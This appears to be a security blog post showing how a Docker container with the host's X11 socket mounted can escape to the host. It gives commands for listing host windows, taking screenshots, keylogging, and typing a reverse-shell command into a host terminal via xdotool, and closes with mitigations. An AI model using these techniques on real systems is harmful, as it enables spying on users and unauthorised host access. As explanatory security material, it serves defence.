Use Docker to run GUI applications they said.
Mount the X11 socket they said.
Allow other users to access your X session they said.
This post covers Docker container breakouts by abusing bad security practices related to the X11 socket.
The problem
To display windows spawned through a Docker container, people often launch containers following these steps:
- Use
-e DISPLAY=$DISPLAYto share the display variable value - Specifying
-v /tmp/.X11-unix:/tmp/.X11-unix:roshares the X11 socket - optionally as read only. - “I can’t see the window, let’s google…”
- “Let’s just execute
xhost +local:rootand it works!”
The X11 socket is mounted as read only - it’s secure right?
The breakout(s)
These attacks can be performed after gaining access to a Docker container:
Reading Window Information
With xwininfo -root -tree it’s possible to check which windows are opened on the host system, including the window titles:
[...]
0xredacted "[i3 con] container around 0xredacted": ("i3-frame" "i3-frame") [...]
1 child:
0xredacted "Write: super secret thing": ("Msgcompose" "Thunderbird") [...]
[...]
Taking screenshots
The command
xwd -root -screen > screenshot.xwd && convert screenshot.xwd screenshot.png
can be used to create a screenshot of the hosts display which makes it possible to watch every action a user performs on the system.
Keylogging
By mounting the X11 socket into the container a user doesn’t just mount the display. Additionally they keyboard also gets shared, so to say. With this, it’s possible to log all keystrokes. There may be better tools for this, but during tests xkey seemed to perform very reliable. Using xkey it’s possible to perform a specific action in case a previously defined key gets hit.
Getting a shell
Although it’s not very stealthy, this method allows getting a shell on the host system. This works by sending keystrokes to the X server in order to open a terminal and execute commands:
xdotool key <Shortcut to open a terminal>
xdotool type 'xterm'
xdotool key Return
xdotool type --delay 50 '<Desired reverse or bind shell command>'
xdotool key Return
The mitigation
- Use XAuthority and don’t use the root user to spawn an X application.
- Check x11docker which basically creates a new X server for isolation purposes.